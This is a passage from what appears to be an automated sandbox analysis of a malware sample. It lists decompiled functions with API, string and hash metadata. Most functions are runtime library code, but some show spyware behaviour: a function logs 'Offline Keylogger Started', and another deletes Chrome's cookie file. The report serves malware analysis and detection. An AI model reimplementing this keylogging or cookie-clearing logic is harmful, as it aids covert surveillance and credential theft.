                                                                                                					}
                                                                                                				}
                                                                                                			}











                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040E83C
                                                                                                • int.LIBCPMT ref: 0040E84F
                                                                                                  • Part of subcall function 0040B970: std::_Lockit::_Lockit.LIBCPMT ref: 0040B981
                                                                                                  • Part of subcall function 0040B970: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B99B
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0040E858
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040E88F
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040E898
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E8B6
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040E8F7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2409581025-0
                                                                                                • Opcode ID: 7f3499ab472a94073dda60883e607865e1961136344be8347b4299be4defa888
                                                                                                • Instruction ID: eccdf18d5aabaf102b0185edd20112d33c9fd6b2d3665569ab00c68a80b96d02
                                                                                                • Opcode Fuzzy Hash: 7f3499ab472a94073dda60883e607865e1961136344be8347b4299be4defa888
                                                                                                • Instruction Fuzzy Hash: 3221D3329042149BCB10FB6AE812D9E3368AF44324F20457BF900A73D1EF78AD45879D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 63%
                                                                                                			E0040964B(void* __ebx, void* __ecx, void* __eflags, char _a4) {
                                                                                                				struct _SYSTEMTIME _v20;
                                                                                                				char _v44;
                                                                                                				char _v68;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				WCHAR* _t33;
                                                                                                				void* _t65;
                                                                                                				void* _t67;
                                                                                                				void* _t70;
                                                                                                
                                                                                                				_t70 = __eflags;
                                                                                                				_t42 = __ebx;
                                                                                                				_t67 = __ecx;
                                                                                                				GetLocalTime( &_v20);
                                                                                                				E00401EEC( &_a4, _t26, _t67, E00403098(__ebx,  &_v44, E00409E9E( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t70,  &_a4), _t65, _t70, L"]\r\n"));
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				_push(0x64 + E0040247B() * 2);
                                                                                                				_t33 = E0043776E( &_a4);
                                                                                                				_t66 = _t33;
                                                                                                				_push(_v20.wSecond & 0x0000ffff);
                                                                                                				_push(_v20.wMinute & 0x0000ffff);
                                                                                                				_push(_v20.wHour & 0x0000ffff);
                                                                                                				_push(_v20.wDay & 0x0000ffff);
                                                                                                				_push(_v20.wMonth & 0x0000ffff);
                                                                                                				_push(_v20.wYear & 0x0000ffff);
                                                                                                				wsprintfW(_t33, E00401EDD( &_a4));
                                                                                                				if( *((char*)(_t67 + 0x49)) != 0) {
                                                                                                					_t19 = _t67 + 4; // 0x46e3b4
                                                                                                					E0040778C(__ebx, _t19, _t66, _t66);
                                                                                                				}
                                                                                                				if( *((char*)(_t67 + 0x4a)) != 0) {
                                                                                                					_t21 = _t67 + 0x1c; // 0x46e3cc
                                                                                                					E0040778C(_t42, _t21, _t66, _t66);
                                                                                                					_t22 = _t67 + 0x3c; // 0x0
                                                                                                					SetEvent( *_t22);
                                                                                                				}
                                                                                                				L00437769(_t66);
                                                                                                				return E00401EE2();
                                                                                                			}













                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046E3B0), ref: 00409659
                                                                                                  • Part of subcall function 00409E9E: char_traits.LIBCPMT ref: 00409EAE
                                                                                                • wsprintfW.USER32 ref: 004096DA
                                                                                                • SetEvent.KERNEL32(00000000,00000000), ref: 00409704
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventLocalTimechar_traitswsprintf
                                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                • API String ID: 3003339404-248792730
                                                                                                • Opcode ID: 124a85308ca917346ab859ccfcbe3ce9a8dddb18d146cd7b34b0f7e922693c53
                                                                                                • Instruction ID: 00f7add78b72f6bc9c174c84cf5df4f94eedd2ef65b0447474714796a340b4ae
                                                                                                • Opcode Fuzzy Hash: 124a85308ca917346ab859ccfcbe3ce9a8dddb18d146cd7b34b0f7e922693c53
                                                                                                • Instruction Fuzzy Hash: F0217771404218AAC728FB95EC959FF77BCAF44705F10412FF942621D1EF78AA85C6A8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 45%
                                                                                                			E00417909(void* __edx) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v12;
                                                                                                				char _v20;
                                                                                                				char _v28;
                                                                                                				char _v36;
                                                                                                				char _v44;
                                                                                                				char _v52;
                                                                                                				void* _t25;
                                                                                                				void* _t26;
                                                                                                				void* _t27;
                                                                                                				void* _t29;
                                                                                                				void* _t30;
                                                                                                				void* _t40;
                                                                                                				intOrPtr* _t44;
                                                                                                
                                                                                                				_t40 = __edx;
                                                                                                				_t44 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
                                                                                                				 *_t44( &_v52,  &_v28,  &_v20);
                                                                                                				Sleep(0x3e8);
                                                                                                				 *_t44( &_v44,  &_v36,  &_v12);
                                                                                                				_t25 = E004179BE( &_v12);
                                                                                                				_t26 = E004179BE( &_v20);
                                                                                                				asm("sbb ebx, edx");
                                                                                                				_t27 = E004179BE( &_v28);
                                                                                                				asm("sbb ebx, edx");
                                                                                                				_v8 = _t25 - _t26 - _t27 + E004179BE( &_v36);
                                                                                                				asm("adc ebx, edx");
                                                                                                				_t29 = E004179BE( &_v44);
                                                                                                				asm("sbb esi, edx");
                                                                                                				_t30 = E004179BE( &_v52);
                                                                                                				asm("adc esi, edx");
                                                                                                				return E00451A20(E004519E0(_t25 - _t26 - _t27 + E004179BE( &_v36) - _t29 + _t30, _t40, 0x64, 0), _t40, _v8, _t40);
                                                                                                			}


















                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00413FDF), ref: 0041791C
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00417923
                                                                                                • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,00413FDF,00000095,00413CCF), ref: 0041793E
                                                                                                • __aulldiv.LIBCMT ref: 004179B2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProcSleep__aulldiv
                                                                                                • String ID: GetSystemTimes$kernel32.dll
                                                                                                • API String ID: 482274533-1354958348
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E0044A3CA(intOrPtr _a4) {
                                                                                                				void* _t18;
                                                                                                
                                                                                                				_t45 = _a4;
                                                                                                				if(_a4 != 0) {
                                                                                                					E0044A111(_t45, 7);
                                                                                                					E0044A111(_t45 + 0x1c, 7);
                                                                                                					E0044A111(_t45 + 0x38, 0xc);
                                                                                                					E0044A111(_t45 + 0x68, 0xc);
                                                                                                					E0044A111(_t45 + 0x98, 2);
                                                                                                					E004414D5( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                                					E004414D5( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                                					E004414D5( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                                					E0044A111(_t45 + 0xb4, 7);
                                                                                                					E0044A111(_t45 + 0xd0, 7);
                                                                                                					E0044A111(_t45 + 0xec, 0xc);
                                                                                                					E0044A111(_t45 + 0x11c, 0xc);
                                                                                                					E0044A111(_t45 + 0x14c, 2);
                                                                                                					E004414D5( *((intOrPtr*)(_t45 + 0x154)));
                                                                                                					E004414D5( *((intOrPtr*)(_t45 + 0x158)));
                                                                                                					E004414D5( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                                					return E004414D5( *((intOrPtr*)(_t45 + 0x160)));
                                                                                                				}
                                                                                                				return _t18;
                                                                                                			}





                                                                                                APIs
                                                                                                  • Part of subcall function 0044A111: _free.LIBCMT ref: 0044A13A
                                                                                                • _free.LIBCMT ref: 0044A418
                                                                                                  • Part of subcall function 004414D5: HeapFree.KERNEL32(00000000,00000000,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?), ref: 004414EB
                                                                                                  • Part of subcall function 004414D5: GetLastError.KERNEL32(?,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?,?), ref: 004414FD
                                                                                                • _free.LIBCMT ref: 0044A423
                                                                                                • _free.LIBCMT ref: 0044A42E
                                                                                                • _free.LIBCMT ref: 0044A482
                                                                                                • _free.LIBCMT ref: 0044A48D
                                                                                                • _free.LIBCMT ref: 0044A498
                                                                                                • _free.LIBCMT ref: 0044A4A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E0040EB3E(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                				void* _v8;
                                                                                                				char _v12;
                                                                                                				char _v28;
                                                                                                				intOrPtr _v36;
                                                                                                				intOrPtr* _t34;
                                                                                                				void* _t39;
                                                                                                				intOrPtr* _t41;
                                                                                                				intOrPtr* _t42;
                                                                                                
                                                                                                				E00430DB5( &_v12, 0);
                                                                                                				_t39 =  *0x46fcdc;
                                                                                                				_v8 = _t39;
                                                                                                				_t41 = E0040BA47(_a4, E0040B970(0x46fed0));
                                                                                                				if(_t41 != 0) {
                                                                                                					L5:
                                                                                                					E00430E0D( &_v12);
                                                                                                					return _t41;
                                                                                                				} else {
                                                                                                					if(_t39 == 0) {
                                                                                                						__eflags = E0040EC05(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							_t34 =  &_v28;
                                                                                                							E0040B836(_t34);
                                                                                                							E00432EDA( &_v28, 0x46976c);
                                                                                                							asm("int3");
                                                                                                							_push(_t41);
                                                                                                							_t42 = _t34;
                                                                                                							E0040B717(_t34, _v36);
                                                                                                							 *_t42 = 0x4552b0;
                                                                                                							return _t42;
                                                                                                						} else {
                                                                                                							_t41 = _v8;
                                                                                                							 *0x46fcdc = _t41;
                                                                                                							 *((intOrPtr*)( *_t41 + 4))();
                                                                                                							E00430FC6(__eflags, _t41);
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t41 = _t39;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}












                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040EB4B
                                                                                                • int.LIBCPMT ref: 0040EB5E
                                                                                                  • Part of subcall function 0040B970: std::_Lockit::_Lockit.LIBCPMT ref: 0040B981
                                                                                                  • Part of subcall function 0040B970: std::_Lockit::~_Lockit.LIBCPMT ref: 0040B99B
                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0040EB67
                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040EB9E
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040EBA7
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040EBC5
                                                                                                • std::exception::exception.LIBCMT ref: 0040EBD4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
                                                                                                • String ID:
                                                                                                • API String ID: 2287991272-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E00435E08(void* __ecx) {
                                                                                                				void* _t4;
                                                                                                				void* _t11;
                                                                                                				void* _t16;
                                                                                                				long _t25;
                                                                                                				void* _t28;
                                                                                                
                                                                                                				if( *0x46c090 != 0xffffffff) {
                                                                                                					_t25 = GetLastError();
                                                                                                					_t11 = E00432A58(__eflags,  *0x46c090);
                                                                                                					__eflags = _t11 - 0xffffffff;
                                                                                                					if(_t11 == 0xffffffff) {
                                                                                                						L5:
                                                                                                						_t11 = 0;
                                                                                                					} else {
                                                                                                						__eflags = _t11;
                                                                                                						if(__eflags == 0) {
                                                                                                							_t4 = E00432A92(__eflags,  *0x46c090, 0xffffffff);
                                                                                                							_pop(_t16);
                                                                                                							__eflags = _t4;
                                                                                                							if(_t4 != 0) {
                                                                                                								_t28 = E00440628(_t16, 1, 0x28);
                                                                                                								__eflags = _t28;
                                                                                                								if(__eflags == 0) {
                                                                                                									L8:
                                                                                                									_t11 = 0;
                                                                                                									E00432A92(__eflags,  *0x46c090, 0);
                                                                                                								} else {
                                                                                                									__eflags = E00432A92(__eflags,  *0x46c090, _t28);
                                                                                                									if(__eflags != 0) {
                                                                                                										_t11 = _t28;
                                                                                                										_t28 = 0;
                                                                                                										__eflags = 0;
                                                                                                									} else {
                                                                                                										goto L8;
                                                                                                									}
                                                                                                								}
                                                                                                								E004414D5(_t28);
                                                                                                							} else {
                                                                                                								goto L5;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					SetLastError(_t25);
                                                                                                					return _t11;
                                                                                                				} else {
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}









                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,00435DFF,00433072), ref: 00435E16
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00435E24
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00435E3D
                                                                                                • SetLastError.KERNEL32(00000000,?,00435DFF,00433072), ref: 00435E8F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: cb87fc4e7ab6080456bdc9289be03dc4a92ec57eff74e1e72ad44e4ad525414a
                                                                                                • Instruction ID: be0b5738b31b3bf61627610657f800f576410448f4cbcb65cdff4a4e015be5f7
                                                                                                • Opcode Fuzzy Hash: cb87fc4e7ab6080456bdc9289be03dc4a92ec57eff74e1e72ad44e4ad525414a
                                                                                                • Instruction Fuzzy Hash: 6001283210D7269EA72027F67C8662B2745EB1D77DF30223FF224451E0FE994C41914E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 75%
                                                                                                			E00409FB8(void* __edi, void* __eflags) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				void* __ebx;
                                                                                                				void* __ebp;
                                                                                                				long _t18;
                                                                                                				void* _t20;
                                                                                                				void* _t21;
                                                                                                				void* _t28;
                                                                                                				void* _t31;
                                                                                                				void* _t32;
                                                                                                
                                                                                                				_t35 = __eflags;
                                                                                                				_t31 = __edi;
                                                                                                				_t30 = E00402076(_t20,  &_v52, E00437AFA(_t20, __eflags, "UserProfile"));
                                                                                                				E004076BB(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
                                                                                                				E00401FB9();
                                                                                                				if(DeleteFileA(E00401F87( &_v28)) != 0) {
                                                                                                					_t28 = _t32 - 0x18;
                                                                                                					_push("\n[Chrome Cookies found, cleared!]");
                                                                                                					goto L6;
                                                                                                				} else {
                                                                                                					_t18 = GetLastError();
                                                                                                					if(_t18 == 0 || _t18 == 1) {
                                                                                                						_t28 = _t32 - 0x18;
                                                                                                						_push("\n[Chrome Cookies not found]");
                                                                                                						L6:
                                                                                                						E00402076(_t20, _t28);
                                                                                                						E0040A724(_t20, _t30, __eflags);
                                                                                                						_t21 = 1;
                                                                                                					} else {
                                                                                                						_t21 = 0;
                                                                                                					}
                                                                                                				}
                                                                                                				E00401FB9();
                                                                                                				return _t21;
                                                                                                			}














                                                                                                APIs
                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 00409FF4
                                                                                                • GetLastError.KERNEL32 ref: 00409FFE
                                                                                                Strings
                                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040A024
                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 00409FBF
                                                                                                • [Chrome Cookies not found], xrefs: 0040A018
                                                                                                • UserProfile, xrefs: 00409FC4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DeleteErrorFileLast
                                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                • API String ID: 2018770650-304995407
                                                                                                • Opcode ID: cc29e18477101dc447a5e55271d12bcfd984b136a0bfcfa5d1d94e7293382bb4
                                                                                                • Instruction ID: a7a5c4a42de72322af555cd48b85ace273aa37efb71ea2a29eb9d084ffcb1a21
                                                                                                • Opcode Fuzzy Hash: cc29e18477101dc447a5e55271d12bcfd984b136a0bfcfa5d1d94e7293382bb4
                                                                                                • Instruction Fuzzy Hash: 5701F731A4020956C604BAB5DD1B8AE7728A911348B50023BF402772D3FD7E9955C28F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 69%
                                                                                                			E004364F9(void* __ebx, signed int __edx, void* __edi, void* _a4, signed int _a8) {
                                                                                                				intOrPtr _v0;
                                                                                                				char _v8;
                                                                                                				signed int _v12;
                                                                                                				char _v16;
                                                                                                				signed int _v20;
                                                                                                				char _v24;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t61;
                                                                                                				void* _t64;
                                                                                                				signed int _t67;
                                                                                                				signed int _t69;
                                                                                                				signed int _t70;
                                                                                                				signed int _t73;
                                                                                                				signed int _t75;
                                                                                                				signed int _t77;
                                                                                                				signed int _t78;
                                                                                                				intOrPtr _t80;
                                                                                                				signed int _t81;
                                                                                                				void* _t82;
                                                                                                				signed int _t84;
                                                                                                				void* _t85;
                                                                                                				signed int _t87;
                                                                                                				signed int _t93;
                                                                                                				signed int _t102;
                                                                                                				void* _t104;
                                                                                                				signed int _t107;
                                                                                                				signed int* _t110;
                                                                                                				signed int* _t111;
                                                                                                				intOrPtr* _t113;
                                                                                                				signed int _t118;
                                                                                                				signed int _t120;
                                                                                                				signed int _t123;
                                                                                                				void* _t125;
                                                                                                				signed int _t128;
                                                                                                				signed int _t131;
                                                                                                				signed int _t139;
                                                                                                				signed int _t145;
                                                                                                				void _t147;
                                                                                                				void* _t148;
                                                                                                				void* _t150;
                                                                                                				void* _t152;
                                                                                                				signed int _t153;
                                                                                                				signed int _t154;
                                                                                                				void* _t155;
                                                                                                				signed int _t156;
                                                                                                				signed int _t157;
                                                                                                				signed int _t158;
                                                                                                				intOrPtr _t159;
                                                                                                
                                                                                                				_t139 = __edx;
                                                                                                				_t155 = _a4;
                                                                                                				if(_t155 == 0) {
                                                                                                					_t113 = E00438932();
                                                                                                					_t159 = 0x16;
                                                                                                					 *_t113 = _t159;
                                                                                                					E00437709();
                                                                                                					return _t159;
                                                                                                				}
                                                                                                				_push(__edi);
                                                                                                				_t123 = 9;
                                                                                                				memset(_t155, _t61 | 0xffffffff, _t123 << 2);
                                                                                                				_t145 = _a8;
                                                                                                				__eflags = _t145;
                                                                                                				if(_t145 == 0) {
                                                                                                					_t111 = E00438932();
                                                                                                					_t158 = 0x16;
                                                                                                					 *_t111 = _t158;
                                                                                                					E00437709();
                                                                                                					_t78 = _t158;
                                                                                                					L12:
                                                                                                					return _t78;
                                                                                                				}
                                                                                                				_push(__ebx);
                                                                                                				__eflags =  *(_t145 + 4);
                                                                                                				if(__eflags <= 0) {
                                                                                                					if(__eflags < 0) {
                                                                                                						L10:
                                                                                                						_t110 = E00438932();
                                                                                                						_t157 = 0x16;
                                                                                                						 *_t110 = _t157;
                                                                                                						_t78 = _t157;
                                                                                                						L11:
                                                                                                						goto L12;
                                                                                                					}
                                                                                                					__eflags =  *_t145;
                                                                                                					if( *_t145 < 0) {
                                                                                                						goto L10;
                                                                                                					}
                                                                                                				}
                                                                                                				_t64 = 7;
                                                                                                				__eflags =  *(_t145 + 4) - _t64;
                                                                                                				if(__eflags >= 0) {
                                                                                                					if(__eflags > 0) {
                                                                                                						goto L10;
                                                                                                					}
                                                                                                					__eflags =  *_t145 - 0x93406fff;
                                                                                                					if(__eflags > 0) {
                                                                                                						goto L10;
                                                                                                					}
                                                                                                				}
                                                                                                				E004442F3(0, _t145, _t155, __eflags);
                                                                                                				_v12 = 0;
                                                                                                				_v16 = 0;
                                                                                                				_v8 = 0;
                                                                                                				_t67 = E00443B28( &_v12);
                                                                                                				_pop(_t125);
                                                                                                				__eflags = _t67;
                                                                                                				if(_t67 == 0) {
                                                                                                					_t75 = E00443B54( &_v16);
                                                                                                					_pop(_t125);
                                                                                                					__eflags = _t75;
                                                                                                					if(_t75 == 0) {
                                                                                                						_t77 = E00443B80( &_v8);
                                                                                                						_pop(_t125);
                                                                                                						__eflags = _t77;
                                                                                                						if(_t77 == 0) {
                                                                                                							_t118 =  *(_t145 + 4);
                                                                                                							_t128 =  *_t145;
                                                                                                							__eflags = _t118;
                                                                                                							if(__eflags < 0) {
                                                                                                								L28:
                                                                                                								_push(_t145);
                                                                                                								_push(_t155);
                                                                                                								_t78 = E0043D9B7();
                                                                                                								__eflags = _t78;
                                                                                                								if(_t78 != 0) {
                                                                                                									goto L11;
                                                                                                								}
                                                                                                								__eflags = _v12;
                                                                                                								asm("cdq");
                                                                                                								_t147 =  *_t155;
                                                                                                								_t120 = _t139;
                                                                                                								if(__eflags == 0) {
                                                                                                									L32:
                                                                                                									_t80 = _v8;
                                                                                                									L33:
                                                                                                									asm("cdq");
                                                                                                									_t148 = _t147 - _t80;
                                                                                                									asm("sbb ebx, edx");
                                                                                                									_t81 = E00451E10(_t148, _t120, 0x3c, 0);
                                                                                                									 *_t155 = _t81;
                                                                                                									__eflags = _t81;
                                                                                                									if(_t81 < 0) {
                                                                                                										_t148 = _t148 + 0xffffffc4;
                                                                                                										 *_t155 = _t81 + 0x3c;
                                                                                                										asm("adc ebx, 0xffffffff");
                                                                                                									}
                                                                                                									_t82 = E00451D60(_t148, _t120, 0x3c, 0);
                                                                                                									_t121 = _t139;
                                                                                                									_t28 = _t155 + 4; // 0x848d0046
                                                                                                									asm("cdq");
                                                                                                									_t150 = _t82 +  *_t28;
                                                                                                									asm("adc ebx, edx");
                                                                                                									_t84 = E00451E10(_t150, _t139, 0x3c, 0);
                                                                                                									 *(_t155 + 4) = _t84;
                                                                                                									__eflags = _t84;
                                                                                                									if(_t84 < 0) {
                                                                                                										_t150 = _t150 + 0xffffffc4;
                                                                                                										 *(_t155 + 4) = _t84 + 0x3c;
                                                                                                										asm("adc ebx, 0xffffffff");
                                                                                                									}
                                                                                                									_t85 = E00451D60(_t150, _t121, 0x3c, 0);
                                                                                                									_t122 = _t139;
                                                                                                									_t31 = _t155 + 8; // 0xa824
                                                                                                									asm("cdq");
                                                                                                									_t152 = _t85 +  *_t31;
                                                                                                									asm("adc ebx, edx");
                                                                                                									_t87 = E00451E10(_t152, _t139, 0x18, 0);
                                                                                                									 *(_t155 + 8) = _t87;
                                                                                                									__eflags = _t87;
                                                                                                									if(_t87 < 0) {
                                                                                                										_t152 = _t152 + 0xffffffe8;
                                                                                                										 *(_t155 + 8) = _t87 + 0x18;
                                                                                                										asm("adc ebx, 0xffffffff");
                                                                                                									}
                                                                                                									_t131 = E00451D60(_t152, _t122, 0x18, 0);
                                                                                                									__eflags = _t139;
                                                                                                									if(__eflags < 0) {
                                                                                                										L48:
                                                                                                										_t44 = _t155 + 0x18; // 0xa024848d
                                                                                                										 *(_t155 + 0xc) =  *(_t155 + 0xc) + _t131;
                                                                                                										asm("cdq");
                                                                                                										_t153 = 7;
                                                                                                										_t51 = _t155 + 0xc; // 0x50506a00
                                                                                                										_t93 =  *_t51;
                                                                                                										 *(_t155 + 0x18) = ( *_t44 + 7 + _t131) % _t153;
                                                                                                										__eflags = _t93;
                                                                                                										if(_t93 > 0) {
                                                                                                											goto L43;
                                                                                                										}
                                                                                                										 *((intOrPtr*)(_t155 + 0x10)) = 0xb;
                                                                                                										 *(_t155 + 0xc) = _t93 + 0x1f;
                                                                                                										_t55 = _t131 + 0x16d; // 0x16d
                                                                                                										 *(_t155 + 0x1c) =  *(_t155 + 0x1c) + _t55;
                                                                                                										 *((intOrPtr*)(_t155 + 0x14)) =  *((intOrPtr*)(_t155 + 0x14)) - 1;
                                                                                                										goto L44;
                                                                                                									} else {
                                                                                                										if(__eflags > 0) {
                                                                                                											L42:
                                                                                                											_t34 = _t155 + 0x18; // 0xa024848d
                                                                                                											asm("cdq");
                                                                                                											_t154 = 7;
                                                                                                											_t39 = _t155 + 0xc;
                                                                                                											 *_t39 =  *(_t155 + 0xc) + _t131;
                                                                                                											__eflags =  *_t39;
                                                                                                											 *(_t155 + 0x18) = ( *_t34 + _t131) % _t154;
                                                                                                											L43:
                                                                                                											_t42 = _t155 + 0x1c;
                                                                                                											 *_t42 =  *(_t155 + 0x1c) + _t131;
                                                                                                											__eflags =  *_t42;
                                                                                                											L44:
                                                                                                											_t78 = 0;
                                                                                                											goto L11;
                                                                                                										}
                                                                                                										__eflags = _t131;
                                                                                                										if(_t131 == 0) {
                                                                                                											__eflags = _t139;
                                                                                                											if(__eflags > 0) {
                                                                                                												goto L44;
                                                                                                											}
                                                                                                											if(__eflags < 0) {
                                                                                                												goto L48;
                                                                                                											}
                                                                                                											__eflags = _t131;
                                                                                                											if(_t131 >= 0) {
                                                                                                												goto L44;
                                                                                                											}
                                                                                                											goto L48;
                                                                                                										}
                                                                                                										goto L42;
                                                                                                									}
                                                                                                								}
                                                                                                								_push(_t155);
                                                                                                								_t102 = E00444344(_t120, _t147, _t155, __eflags);
                                                                                                								__eflags = _t102;
                                                                                                								if(_t102 == 0) {
                                                                                                									goto L32;
                                                                                                								}
